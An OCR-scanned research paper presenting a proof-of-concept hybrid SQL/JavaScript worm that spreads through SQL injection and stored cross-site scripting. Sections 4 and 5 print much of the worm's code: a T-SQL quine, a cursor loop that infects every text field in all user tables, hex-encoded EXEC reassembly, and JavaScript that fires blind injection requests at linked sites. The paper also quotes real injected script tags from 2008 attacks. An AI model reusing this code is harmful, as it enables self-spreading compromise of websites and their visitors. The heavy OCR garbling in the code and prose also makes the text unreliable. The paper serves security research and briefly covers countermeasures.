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Abstract. Delving into present trends and anticipating future malware 
trends, a hybrid, SQL on the server-side, JavaScript on the client-side, 
self-replicating worm based on two-stage quines was designed and im- 
plemented on an ad-hoc scenario instantiating a very common software 
pattern. The proof of concept code combines techniques seen in the wild, 
in the form of SQL injections leading to cross-site scripting JavaScript 
inclusion, and seen in the laboratory, in the form of SQL quines propa- 
gated via RFIDs, resulting in a hybrid code injection. General features 
of hybrid worms are also discussed. 

1 Introduction 

In the cognitive science classic introduction Gddel, Escher, Bach: an Eternal 
Golden Braid [TU] is vastly explored the notion of quine, a self-referential asser- 
tion named after Willard van Orman Quine, a famous logician. 

"Yields falsehood when preceded by its quotation" yields falsehood when 
preceded by its quotation. 

This kind of assertions, related to the liar's paradox are crucial to logic the- 
orems such as Gddel's Incompleteness Theorem [7]. In the case of practical com- 
puting, quines lead to self-replicating programs, and uncontrolled or opponent- 
controlled worms and virus, which are programs copying from one computer 
to another without notice. These automatas are able to execute some pay load 
and also print their own source code in another place, step called infection. The 
distinction between computer virus and worms is made because worms do not 
need to attach to another program for survival, can replicate on their own as 
long as the conditions are favorable. Usually viruses travel attached to these 
other programs or files, but worms exploit distributed system vulnerabilities to 
propagate. 

JavaScript (JS) worms propagate mainly using badly encoded data that con- 
ceals executable code provided to the clients, i.e. persistent cross-site scripting, 
in this work we present a proof of concept of a novel hybrid client-server worm 
infecting websites vulnerable to cross-site scripting (XSS) and SQL injection 



(SQLi) simultaneously. It was tested on an ad-hoc laboratory scenario devel- 
oped using widely deployed technologies. We focused on running Structured 
Query Language (SQL) Database Management System (DBMS) quine code on 
the server-side and JavaScript browser quine code on the client-side. Many en- 
coding and size restrictions have been bypassed and new SQL and JS code 
techniques have been developed to reach the proof of concept. 

The main contribution is demonstrating the feasibility of application-agnostic 
worms running replication code both in the server and the client, without running 
native operative system code, but using as a second stage in the propagation step 
JS code sent to the clients through a XSS vulnerability. Application-agnostic 
means that the worm exploits generic security bugs that are replicated on many 
different applications using the same technologies. This kind of worm is also 
independent of the native hardware platform, can affect Windows XP running 
on x86 or Windows Server 2003 running on Itanium, as long as we use compatible 
language fragments of Microsoft SQL Server dialect]^ The use of two-stage quines 
including two languages is also a novelty. 

The rest of the paper is organized as follows: We provide additional context 
and motivation based on previous works and attacks seen in the wild in Section 
[2] A high-level discussion of hybrid worm features is presented in Section [3] We 
describe in detail the techniques used in our proof of concept worm in Section [4] 
We examine possible reflective and dual quine variations in Section [5] and coun- 
termeasures are explained briefly in Section [6] Finally, we conclude in Section |7] 
with achievements and future work. 

2 Related Work 

2.1 Code Reflection and Quines 

In all general-purpose programming languages quines can be developed, mixing 
programs and data and, for example, escaping quotes inside strings of charac- 
ters. But the difficulty of programming these quines and their length can be 
reduced if the target programming language has features supporting structural 
reflection, that is, the ability of the language to provide a complete reification 
of the program currently executed [6]. Reification means that the program in 
execution can be encoded as data. In our case we develop quines without using 
the JavaScript or SQL reflection features and also using them. 

The idea of using SQL quines in the present research was inspired by basic 
SQL quines presented on previous research testing the possibility of RFID mal- 
ware |16j . running on various SQL implementations but specific for a predefined 
table-field couple. Our proof of concept includes a quine that is not specific to 
any database table or field, programmed in the Transact-SQL (T-SQL) dialect, 

^ Client web browser code compatibility was easily achieved for the proof of concept 
as it uses a small set of JS features and was tested on the two most commonly used 
browsers: Firefox 3.0 and Internet Explorer 7.0. 



Microsoft and Sybase's implementation of SQL using code from the injec- 
tion attacks seen in the wild. In the commented work [TB], the possibility and 
complexity of the SQL quines depend on SQL implementation features such as 
allowance of multiple statements per query, quotation and comments. They made 
experimental SQL viruses affecting only specific tables and fields for Oracle iSQL, 
PostgreSQL and Microsoft SQL Server using string quotes escaping and multi- 
ple statements but MySQL does not has the later feature by default. They also 
successfully used reflective features of Oracle iSQL such as GetCurrentQuery () 
but reflective features of PostgreSQL are not active by default and MySQL re- 
flective feature (i.e. SHOW ProcessList) cannot be combined with other queries. 
In Microsoft SQL Server, they were not able to test the sys . dm_exec_sql_text 
reflection feature but we have tested it (see Section |5|. 

2.2 Worms 

Main security bug type affecting SQL is SQLi, when data provided by a web 
application's remote user contains SQL code that is not properly escaped to 
be inserted or concatenated inside previously existing SQL code. A type of JS 
security bug that sometimes allows the creation of worms is XSS. JavaScript and 
SQL security bugs have already been systematically exploited in the industry 
of penetration testing |11I12I17] but worm and virus research regarding this 
platforms is little or restricted to underground publications. 

Most worms remotely access server capabilities of the computers to control 
code execution. Extensive effort has been put on the modeling of virus spread 
[4], but this kind of analysis is usually limited to worms that employ random 
scanning to propagate through a uniform network of servers using the socket/- 
transport abstraction. For example the CodeRed worm f 5|15l attacks a speciflc 
type of web server listening on the http port exploiting a buffer overflow and 
propagating to other servers in the same fashion using random-scanning with a 
fixed probability distribution. 

Similar incidents with worm affecting SQL servers have centered on using 
native OS command shell to infect SQL servers with blank or null passwords. 
The SQL platform is only used as an entry point, similar to any other server 
application with a weak configuration. SQLSnake, also known as Spida worm, is 
a well researched example of this kind of worms [3] . 

During 2003 the Blaster worm [1] and the Slammer worm [IT exploited vul- 
nerabilities on exposed services of the Windows OS and the Microsoft SQL Server 
systems, respectively, to execute native x86 code. Other more recent worms af- 
fect the web platform to run client-side interpreted code on client applications, 
for example during 2007 the Samy worm [8j propagated through the MySpace 
website infecting user profiles with JavaScript (JS) code ran on web browsers. 
In this type of web worm exploiting cross-site scripting vulnerabilities (XSS), 
worm code is stored on the server-side but only is executed on the client-side, 
exploiting a persistent case of XSS [17 . Recent attention has gathered and ideas 
have been published in the applied security research community raising alerts 
regarding possible hybrid worms that execute code on both the client and the 



server side of the computer networks, but no concrete proof of concept has been 
discussed in detail. 

2.3 Hybrid Attacks 

During 2008, hybrid chent-server JavaScript-SQL attacks have been seen in the 
wild (see the following excerpts collected from web forums). 

[..]Anyone know about www. nihaorr 1 . com/1 . js? The db that supports our 
companies ecommerce is filling up with this url[..] 

[..]The script www. nihaorr 1 . com/1 . js is getting inserted into every record of 
my organizations SQL db. Fm the accidental techie in my office, and Fm 
clueless [..] 

The reference to this script is still alive in thousands of infected websites, like 
debris, although that domain was brought down. Looking for "nihaorrl . com/1 . j s" 
on your favorite web search engine will show some affected sites and their infected 
HTML code (see the following excerpt as an example). 

<td class="contentheading" width=" 100y."> 

Internet-Best ellservice SER<script src=\protect\vrule widthOpt\protect\href {http: //www. nihaorrl . co 

</ script> 

</td> 

This attack combines the injection of SQL code in a web server, with a later 
infection of database text data with JavaScript code to test different binary 
vulnerabilities on the IE browser of the website's client user, leading to a massive 
botnet or remotely controlled computer zombie collective (13ll8j . We use in 
the present work some techniques seen in these attacks. Apparently a tool for 
replicating this kind of hybrid attack has been distributed because very similar 
infections have been seen pointing to different domains. In this case, the hybrid 
SQL/ JavaScript injection was used as a multiplier technique for botnets, but not 
as a worm on its own. 

Modern SQL implementations also include access to the operative system 
underneath where classic worms usually move but we are concerned with the 
exploration of new directions on pure SQL/ JavaScript worms manipulating vic- 
tim's data tables directly. 

A closely related work has been presented on hybrid client/server worms [9] 
focusing on obfuscated and mutated JS code and Perl server code. Different 
possibilities of more infectious and stealthier worms were analyzed, according to 
that work, can be developed based on concepts extracted from the Santy worm, 
a server-side Perl worm detected in 2004. No complete proof of concept worm 
was presented, just proof code of mutable JS code. 

3 Hybrid Worms Features 

The following are feasible and dangerous features that can be easily implemented 
on hybrid worms. 



No choke point. No dependence on third-party services must be used for the 
replication. The Santy worm makes web search queries to find new vulnerable 
web servers, these queries were blocked providing a single choke point for that 
worm (9j. In the case of the BeanHive virus written in Java and detected in 
1998, the main code resides on a single server. Another case are the hybrid 
JS/SQL attacks seen in the wild on 2008, the injected JavaScript references 
the extended code located on a centrally controlled location ^13] [18]. In our 
proof of concept, no third-party JS is referenced or web search engine is used. 
Persistence in time has been reached by various worms described in Section 
[2] by avoiding choke points when replicating. 

Stealthier infections. Instead of random scans searching for an open port, 
such as in previous worms jl|14j . web or social graph can be exploited for a 
spreading that targets existing systems. For example, the Samy web worm 
affecting MySpace has the record for fastest worldwide spread in three hours 
because infected just friend profiles. In our proof of concept, web link struc- 
ture is used to direct blind injections to other web servers. 

More portability. Client or server-located high-level interpreted languages are, 
by definition, more portable. On previous work attention has been brought 
to interpreted languages such as Perl and Python but in our work we 
focused on SQL code inside the DBMS. We do not achieve universal DBMS 
portability due to the particular SQL implementation we targeted, T-SQL, 
but portability was reached inside the family of Windows operative system 
platforms, not necessarily running x86 code. Generic SQL exploitation was 
explored on previous work |11| . 

Target generic vulnerabilities. Code injection in web applications, mainly 
XSS and SQL injection, are more generic, meaning that the platforms are 
fewer and more similar than native code platforms, so this leads to the 
development of automated tools generating generic exploits working with 
different applications . Generic vulnerabilities open the door to more effective 
blind exploits such as the simple one implemented in the proof of concept 
included here on Section |4l 

Easily obfuscated. Programs written in interpreted languages are more easily 
modified and obfuscated than compiled bytecode [S]. In our case, we only 
used a standard T-SQL function for encoding the injection into hexadecimal. 

Less crashes. Also due to usage of interpreted languages or languages running 
over a virtual machine, crashes after worm bugs or negative infections are 
less common, increasing also the stealthiness of these hybrid worms. Native 
failures many times conclude with system crashes or data loss. 

We continue with the complete details of the proof of concept designed and 
implemented in T-SQL and JavaScript and tested in an ad-hoc scenario including 
two vulnerable homemade web applications. Vulnerabilities in both web sites 
include SQL injections on an integer URL parameter and XSSs on a text field 
retrieved from the database into the web browser of any user accessing these 
web applications. 



4 Proof of concept details 



To validate the possibility of implementing this kind of worms in SQL and JS, 
delving into present trends, anticipating future trends in malware based on ex- 
isting attacks and preparing for the real threats, a limited proof of concept was 
designed, implemented and tested in a controlled and ad-hoc setting. 
The obstacles bypassed and salient features are: 

• database field limitations, 8KB practical limitation for TEXT or VARCHAR 
fields; 

• double reificated SQL code, that is, some code is doubly escaped for the 
worm to work; 

• same-origin policy was bypassed using <img/> tag blind requests to other 
domains TT]; 

• and URL encoding of the egg was simplified using hexadecimal encoding 
within T-SQL. 

Limitations of the present proof of code that can be bypassed with extra 
efforts include: 

• reinfection is not detected and avoided; 

• only URLs with one parameter are attacked; 

• the URLs parameter attacked must be an integer; 

• and no restriction to specific vendor URLs are collected (for example . asp) . 

We describe the scenario, implementation details, techniques used, payloads, 
and possible variations using dual quines and refiective features. 

4.1 Scenario 

The general scenario for the worm self- replication can be seen on Figure [T] 
A step-by-step explanation of the two-stage worm propagation is mandatory. 

1. Begins with a person (Mallory) injecting the SQL egg into a vulnerable web- 
site (Alice.com). 'Vulnerable' here means that SQL code properly formatted 
on one of the URL parameters of the website can reach the DBMS using a 
SQLi. 

2. The injected SQL eg^ travels to the DBMS of the website. 

3. The SQL egg executes the first stage of the two-stage quine and infects all 
the TEXl]^ typed fields. Infecting these fields means appending the JS egg to 
all the record fields of these particular types. The JS egg includes a copy of 
the SQL egg. 

* With 'egg' we are denoting some executable code that travels encoded and concealed 

as non-executable data. 
^ VARCHAR typed fields can also be infected but this fields must have a bigger enough 

predefined size. Eight hundred characters is the maximum size of VARCHAR table 

fields in SQL Server. 




Fig. 1. Replication Scenario 



4. A user of the infected website (Carol) asks for a page that contains an in- 
fected field data, then contains a copy of the JS egg. Here the XSS vulnera- 
bility appears into scene. 

5. The JS egg executes on Carol's browser. It uses a procedure to retrieve 
possible victim hyperlinks from the webpage in another domains, that is, 
other web applications. 

6. The selected hyperhnks are used by the JS egg to direct its copy of the SQL 
egg to the new possible sites/victims (Bob.com) using blind injections. The 
second stage of the two-stage quine starts here. 

7. If any of the targeted hyperlinks falls under the SQL injection, the second 
stage of the quine is completed and a complete worm copy is ready to start 
over again in the second infected web server (Bob.com). The worm can spread 
to even more clients (Daniel, Ernest, Fiona) manually accessing this domain. 



4.2 Implementations Details 

The ad-hoc vulnerable scenario was built with widely deployed technologies. 
Microsoft SQL Server 2005 was used as the DBMS on the server and web ap- 
plications were programmed in Python 2.5, using HTTP server CherryPy 3.1. 
Access from Python to the DBMS was provided by a generic industrial recipe 
available from the web [5]. Two equally vulnerable web sites hosted on different 
domains were infected. SQL injection on an integer URL parameter and cross- 
site scripting in a text field are featured in both websites. Also each website has 



an hyperlink to the other site, to enable the blind propagation proposed and 
implemented. It is important to remark that, besides the passive and conscious 
avoidance of filters protecting from the SQL injections and escape encoding 
protecting from the XSS, no active efforts or modifications on the victim appli- 
cations were made on the laboratory scenario to make the exploits work. On the 
client side, the worm was tested on Firefox 3.0 and Internet Explorer 7.0. 

4.3 Techniques Used 

In this section we detail some of the techniques used in the proof of concept. 
Some of the techniques have been seen in the wild and some in the laboratory, 
the rest and the combination is original from the present work. 

In previous work |16j . quines running on different SQL implementation were 
implemented, but not particularly an example storing its own code on a variable 
was developed for T-SQL. A basic example running on top of T-SQL, storing in 
variable Oquine its code is shown (see Fig. [2| . 



DECLARE ®a varchar{MAX) ■ 
SET ' 

DECLARE„@quine„varchar (MAX) ; 

set „@quine„=„ ' 'DECLARE„@a„ varchar (MAX) ; 

SET^@a=' ' ' ' ' '^+^replace (@a, '''''''','''''''''''') 

+ ' '-HSa; 

— SgLJAYLOADJIERE— 

) . 

) 

DECLARE Oquine varchar{MAX) ■ 

set @quine = 'DECLARE„Qa„varchar (MAX) ; 
SET^@a^' ' ' + replace (@a, ' ' ' ' ^ ' ' ' ' ' ') 

+ ' ' ' ; '4^a; 
— SQL_PA YLOADMERE— 



Fig. 2. T-SQL basic quine. 

The generic code for infecting all text fields in all the user tables of the 
database via T-SQL is also shown . This code (see Fig. [s]) was used as the 
SQL payload in the previous quine. 

User tables have xtype equal to u, and TEXT, respectively NTEXlj^ table fields 
have xtype equal to 35, respectively 99. 

The SQL egg was encoded using T-SQL function f n_varbintohexsubstring 
(). Because this function has a thousand-byte limitation we split the SQL egg 
into four parts before encoding and replacing the encoded egg inside the JS 
egg. The encoding also simplified the implementation of the quine because many 



Unicode TEXT. 



DECLARE OT varchar (255) ,®C varchar (2 5,5) ; 
DECLARE Table_Cursor CURSOR FOR 

select a . name , b . name from sysobjects a, syscolumns b 

where a.id=b.id 
and a . xtype= ' u ' 

and (b.xtype — 99 or b . xtype — 35) 
OPEN Table_Cursor 

FETCH NEXrmOM Table.Cursor INTO @T,@C 

WHILE ( @@FETCH^TATUS= ) 

BEGIN 

exec{ 'update„'4@T+'„set„'-f«>f' = 
„„„„„„„„rtrim( convert (varchar (255), '-HlCf' )) 
„^^„„„^^+"JS_EGGJIERE' ' ; ' ); 

FETCH NEXrmDM Table_Cursor INTO @T,@C 

END 

CLOSE Table_Cursor ; 
DEALLOCATE Table.Cursor ; 



Fig. 3. T-SQL all table, all record, infection. 

nested escaped quotes were avoided. The hexadecimal encoded SQL egg is scat- 
tered into four fragments that are reassembled and then executed with EXEC ( ) . 
The fragments are string inserted as SEMI, SEM2, SEM3 and SEM4, and during the 
construction of the egg are string replaced by the final fragments. The complete 
size of the SQL injection is 7359 bytes, so SQL interfaces limiting the size of 
the TEXT fields to 4096 bytes will truncate and deactivate the worm. In the SQL 
interface chose for the laboratory scenario f? these fields were truncated at 8192 
bytes by default, giving enough space to the worm to move around. 



; DECLARE @S VARCHAmMAX) ,@S2 VARCHARiMAX) ,@S3 VARCHARiMAJC) , 
@S4 VABCHAItiMAX) ■ 

SET @S=G4Sr(SEMl AS VAI{aiAR{MAX) ) ; 
SET @S2=C:45'r(SEM2 AS VARCHARIMAX) ) ; 
SET @S3=C:45'r(SEM3 AS VARCHARIMAX} ) ; 
SET @S4=C:A5r(SEM4 AS VARCHARiMAX) ) ; 

exec(@S+@S2-H§S3-|-@S4) ; — 



Fig. 4. SQL reassembly and execution 

The SQL egg that is injected (see Fig. [i]) in a URL via the HTTP protocol 
is also encoded with some simple replacements: ' + ' replaced with '7„2B'; ' ' 
replaced with ' + ' ; and ' ; ' replaced with ' °/o#3B ' . 

In the JS stage of the quine, the affected webpage is analyzed with a regular 
expression looking for new possible web servers, and blind HTTP GET requests 



are performed writing fake <iing> tags with an external location (see Fig. [5|. 
This printed tag generates a blind request as an attempt to propagate because 
due to browser same origin policy [17' the response to the request can't be seen 
from the JS code. 



<script > 

var t ext=document . documentElement . innerHTML ; 

var regexp=ne?i; RegExp ( " [ a— zA— ZO — 9 — .? = + 

\/[a-zA-Z0-9-\.?_&=]+=[0-9]+" ,"g" ); 

var ir^t ext . match ( regexp ) ; 

var sql_egg="SQL_EGG" ; 

/or(var i =0; i<rn. length ; i++) 

{ 

document . write ( "<img„ sr c="4m[ i ] + sql _egg+">" ) ; 
alert (m[ i ] ) ; 

} 

/*EXTRAJSJ>A YLOAD* / 
</ script > 



Fig. 5. Second stage of the quine, JavaScript. 

Finally the complete code for generating the initial egg is presented. To avoid 
redundant details in this presentation we are calling NDNQUINE the non-quine 
fragment of code (Figure |6| . In another figure (see Fig. [7| , the non-quine frag- 
ment is inserted in two places, in the first place all single quotes are replaced 
with double-quote^ because is inserted inside a SQL string of characters, and 
with no modifications in the second place. 

Also a partial example of an injected URL is showed (see Fig. [s]) . Notice that 
this type of multiple statement injection might not work by default on other 
SQL systems like MySQL [TT]. Special attention was put on the SQL quotations 
because some parts are doubly quoted when payload uses metaprogramming (i.e. 
EXECO) inside the quine. 

4.4 Payloads 

As the proof of concept include no payload, in this subsection we speculate about 
possible SQL or JS payloads included within this kind of worms. Payloads up- 
dated in a botnet fashion via a third-party website or IRC server can be choked 
and stopped but could just represent an updateable second layer of attacks. The 
first layer can be some hybrid worm, and the second layer could consist of JS 
code that exploits binary vulnerabilities [13] [H] or SQL code that access the un- 
derlying OS via shell command^ This is a serious and dangerous issue because 

We introduce function SQL_ESCAPE just for presentation purposes. 
® In Microsoft SQL Server this is achieved with the xp_cmdshell () T-SQL function. 



1 DECLARE @.JE v archar (MAX) ; 

SET @JE = '<script >var„text=document . documentElement . innerHTML ; 
3 var _rcgexp=ncw_RegExp (" [ a-zA-ZO - 9 - . ? _ & = : \ / ] + \ / [ a-zA-ZO - 9 - \ . ? _&=] + 

= [0-9] + ","g"); 
5 V a r _iT^ text . match ( rcgcxp ) ; 

vai:_£;ql_cgg=''%3BDECLAR£+@S+VARCHAR(MAX) , @S2+VARCHAR(MAXJ , @S3+VAHCHAR(MAX) , 
7 @S44VARCHAR(MAX) %3BSET+@S=CAST (SEM1+AS4VARCHAR(MAX) ) %3B 

SET+@S2^AST ( SEM2+AS+VARCHAR(MAX) ) %3BSET+@S3=CAST ( SEM3+AS+VARiCHAR(MAX) ) %3B 
9 SET+@S4^AST(SEM4+AS4-VARCHAR(MAX))%3Bexec (®S%2B@S2%2B®S3%2B®S4)%3B "; 

for(var_i^O;i<m. length; i++) 
11 { 

document . write ("< img _ s r c =" +m [ i]+sql-egg+">"); 

13 alert(m[i]); 

} 

15 /*JS_PAYLOAD* / 

</£;cript > ' ; 
17 DECLARE @b varckar(MAX)\ 
set '&h = 

19 DECLARE„@T_varchar (255) ,@C_v archar (255) ; 

DECLARE^ Tablc.Cursor _CURSOR_FOR 
21 select „a. name , b . name „from „ syaobjects -a , _syscolumns _b -where -.a . i d=b . i d 

23 and„ ( b . xtypc „=_.99_or^b . xtypc„=„35) 

OPEN^ T a b 1 c _ C: u r s o r 
25 FETCH _NEXT_FROM_ Table.Cursor _INTO_@T , @C 

WHILE ( @@FETCH_STATUS = ) 
27 BEGIN 

exec(_' 'update_' '-HgT+ ' ' _set _ ' '-H@)Cf ' ' = 

29 rtrim( convert (varchar (255), ' '-H§)Of ''))+''' 'JEM '''';''_); 

FETCH_NEXT_FROM_ Table_Cursor _INTO _@T , @C 

31 END 

CLOSE_Table-Cursor ; 
33 DEALLOCATE^Table-Cursor ; 



35 set @b = replace (@b, 'JEM ' , ® JE ) ; 

declare @x v a r b i n a r y (M4X) ; 
37 set @x ^ cast 

DECLARE„@a_ varchar (MAX) ; 
39 SET_@a^' ' 

' + replace ( @a ^ '''' ^ '''''' )_|_ j 
41 set @b ^ replace(@b, 'SEMI', 

master .dbo. fn.varbintohexsubstrir 
43 set @b = replace (@b, 'SEM2', 

master . dbo . fn_varbintohexsubstrir 
45 set ®b = replace (@b, 'SEM3', 

master . dbo . fn_varbintohexsubstrir 
47 set @b = replace(®b, ' SEM4 ' , 

master . dbo . fn_varbintohexsubstrir 
49 exec ( @b ) ; 

SQL. PA YLOAD 

51 

select @b ; 



6a as varbinary (MAX) ) ; 

g(l, substring (@x,l ,1000) , 1, 

g(l, substring (@'x, 100 1 ,1000) , 

g(l, substring (<mx,2001 ,1000) , 

g(l, substring (@x,3001 ,1000) , 



0)); 



0)); 
0)); 
0)); 



Fig. 6. Fragment NONQUINE of the complete SQL bootstrap code that inserts the 

self-replicating code inside the JS code fragment and infects the database with 
the JS code. Some whitespaces were added for presentation purposes. 



DECLARE @a varchar{MAX) ; 
2 SET @a^' SQL J:SCAPE (NONQUINE) 
NONQUINE 

4 

select @b; 



Fig. 7. Complete SQL bootstrap code that stores on @b the quine containing 
the SQL egg. Some whitespaces were added for presentation purposes. 

\protect\vrule widthOpt\protect\liref {http : //192 . 168 . 1 . 105 : 8081/greetUser?numici=l>{http : //192 . 168 . 1 . lOi 
®S2+VARCHAR(MAX) ,(aS3+VARCHAR(MAX) ,aS4+VARCHAR(MAX)7.3BSET+@S=CAST(0x0<i0a44. . . 



Fig. 8. Partial example of URL with injection sent in a blind GET request. 



the first layer anticipated in the present research could serve as a stealthier basis 
of a more visible, but updated on demand, second layer of compromised systems. 
Special attention must be put in public social networking systems because these 
systems make intensive use of input from untrusted users. 



5 Dual worms and reflection features 



The first-stage of the self-replication work can be made on the JavaScript side 
inserting a SQL egg into anyone of the JavaScript quines exposed here (see Fig.jo]- 



10 ). These JS quines have the property of not printing its code on a HTML page 



but handling its code in a variable, called quine in these particular examples. 
This gave them all the reflection flexibility needed to be extended into a fully 
developed dual worm. 



<script > 

a='quine=<script > \ '\\\ '\ ' + a . replace ( \ ' \ \ \ ' \ \ ' \ \ \ \ \ \ \ ' \ ' ) 

. replace (\'\\\\\'A'\\\\\\\\\') + \'\\\'\' + a + \'; alert (quine); 

/*JS_PAYLOADJlERE*/</scr\'-(-\'ipt >\" ; 

quine='< script >a=\' '+a .replace('\'','\\\'') 

. replace ( '\\ ' , '\\\\ ')+' \ '; '-fa-f' ; alert ( quine ) ; 

/*JS_PAYLOAD_HERE*/</scr '-f' ipt>' 

alert ( quine ) ; 

/* JS^PA YLOADJIERE* / 

</ script > 



Fig. 9. JS quine using no reflective features, just strings and quotes. Some 
whitespaces included for presentation purposes only. 



<script id="myid"> 
quine = "<s c r ip t ^ id=\" myid\" >" -f 
document . getElementByld(" myid" ) . text 
+ "</scr"-h "ipt>" 

alert ( quine ) ; 

/* JS.PA YLOADMERE* / 

</script > 



Fig. 10. JS quine, using reflection feature tag identification and 
getElementByld. Some whitespaces for presentation purposes only. 



Typically, the </script> tag is split in two when located inside other script 
tag because it cannot be escaped, otherwise it wrongly marks a premature end 



of the script . From both versions signatures can be extracted for Intrusion Pre- 
vention/Detection Systems (IPS/IDS) but the easiest way is to make a signature 



for the custom identification myid of the second version (see Fig. 10 1. 



The later JS quine (see Fig. 10 1 is an example of usage of language reflec- 
tion features. As explained in Section [2] all programming languages theoret- 
ically have reflective abilities but this abilities can be enhanced with explicit 
features supporting them. Regarding SQL, we tested a worm variation using 
Microsoft SQL Server reflection features such as sys . dm_exec_sql_text and 



sys . dm_exec_query_stats query information tables (see Fig. 11 ), but we do not 
have positive results because queries must ran two times to be observed in the 
query statistics. Also the query injected is observed inside the web application 
query where the injection is performed and this introduces an uncontrolled fac- 
tor not directly predictable, the application query is obscure and may vary from 
application to application infected, so is more difficult to implement a generic 



worm. Although, the worm candidate is shorter, less than 4KB (see Fig. 11 1 



1 select 'sql_payload_h.crc"; 

DECLARE @Q war-char (8000); 
3 SET @Q = {select top 1 st.toxt 

from sys . dm _cxcc .query _st ats as qs 
5 cross apply sys. dm_t!xcc_sql_tcxt(qs.sql_ handle) as st 

where st.tcxt like ■%sql_payload_hGrc%'); 

7 

DECLARE @JE «aT-c/iar(800 0); 
9 SET @JE — ' 

<script >var_tcxt = documcnt . documontElcmont .inner HTML ; 

11 var_rcgGxp=ncw_RcgExp(" [ a-zA-Z - 9 -.?_&=: \ /] -f \ /[ a-zA-ZO - 9 - \ .?_&=] -f = [0 - 9] +' 

"g" ); 

13 var _n:^tcxt .match(rGgGxp); 

var^sql_Ggg=" %3BDECLARE+@S4-VARCHAR (8000) , @S2+VARCHAR.( 8 D ) % 3 B 

15 SET-|-@S^AST ( SEM 1+AS4-VARCHAR ( 8 ) ) % 3 B 

SET+@S2^AST ( SEM2+AS4-VARCHAR( 8 000 ) ) % 3B 

17 GXGc (@S%2B@S2)%3B "; 

for (var_i=0;i<m. longth ; i++) 

19 { 

document . w r i t c ( " < i mg _ s r c =" +m [ i ] s q 1 _ g g g + " > " ) ; 

21 document . w r i t e ( " < img _ a r c =" +m [ i ] -f s q 1 _ g g g + " > " ) ; 

alert (m[ i ] ) ; 

23 } 

/*JS_PAYLOAD*/< / script > ^ ; 

25 

declare @x varbinary( MAX ) ; 
27 set @x = cas£{@Q as v a r b i n a r y (MAX) ) 

29 SET @.IE = replace (@JE, 'SEMI maatGr.dbo.fn_varbintohcxsubstring(l 
substring { cast {mx as v a r b i n a r y ( AMX) ) , 1 , 1 ) , 1, 0) ); 

31 SET @JE = replace (@JE , 'SEM2 master.dbo.fn_varbintohcxBubBtring(l 
sub string ( cast (@x as v a r b i n a r y ( MAX) ) , 1 1 , 1 ) , 1, 0) ); 

33 DECLARE @T wQrc;iar(255),@C v ar c h ar {2 5 5 ) ; 
DECLARE Table.Cursor CURSOR FOR 

and a . xty pc= ' u " 
37 and (b.xtypc = 99 oT-b.xtypG = 35) 

OPEN Tablc.Cursor 
39 FETCH NEXT FROM Tablc.Cursor INTO @T,@C 

WHILE ( @@FETCH_STATUS= ) 
41 BEGIN 

exec ( ■updatG_ '+@T+ ' „sc t _ ' +@Cf " = rtrim(convert (varchar (255) 
43 +''';'); 

FETCH NEXT FROM TablcCursor INTO @T,@C 

45 END 

CLOSE Tablc.Cursor ; 
47 DEALLOCATE T a b le _C u r b o r ; 



a . id=b . id 



, '-f@Of' )) + ' ' "+@JE 



Fig. 11. Flawed hybrid worm, using T-SQL reflection features. 



In this variation (see Fig. 11 1 the self-code of the query is retrieved and stored 
in variable ®Q (see hnes 2-6), then this code is spht into two parts, encoded in a 
hexadecimal representation (see lines 26-32) and inserted inside the JavaScript 
code (see hnes 8-24) that wiU infect the TEXT or VARCHAR fields of the database. 
Finally the JS code is inserted in the database (see lines 33-47) . At the beginning 
of the worm a generic SQL pay load can be inserted (see line 1) and inside the 
JavaScript segment of the worm a generic JS payload can be inserted (see line 
24). 



6 Countermeasures 

There is plenty of bibliography on how to detect and avoid SQL injections and 
XSSs during the development of applications or after being audited |11I12I17] . 
Some solutions concentrate on escaping, denying or avoiding bad types on URL 
parameters reaching the web server. Also DBMS security must be enforced to 
avoid update or modifications permissions on applications and users that do not 
need them. As noticed in previous work [9], IPS/IDS system might focus on 
quantitative properties of the egg code, in case of obfuscated or mutating code, 
instead of signatures. 



7 Conclusion 

A new hybrid worm concept giving insight on present trends and anticipating 
future trends in malware and botnets has been proved feasible. A shortcoming 
of this research is that no extensive statistical evaluation of propagation was 
practiced on sampled web hyperlink structure. This sampling might even be 
considered unethical or harmful if includes testing for SQL injection vulnera- 
bilities on the wild. Possible extensions could be developing a DBMS agnostic 
worm, that can do database system reconnaissance and adapt its SQL commands 
based on the target SQL system, even based on the system version. Other exten- 
sion could be delving deeper into techniques for SQL obfuscation within T-SQL 
(apart from simple metaprogramming and hexadecimal encoding we tested). 
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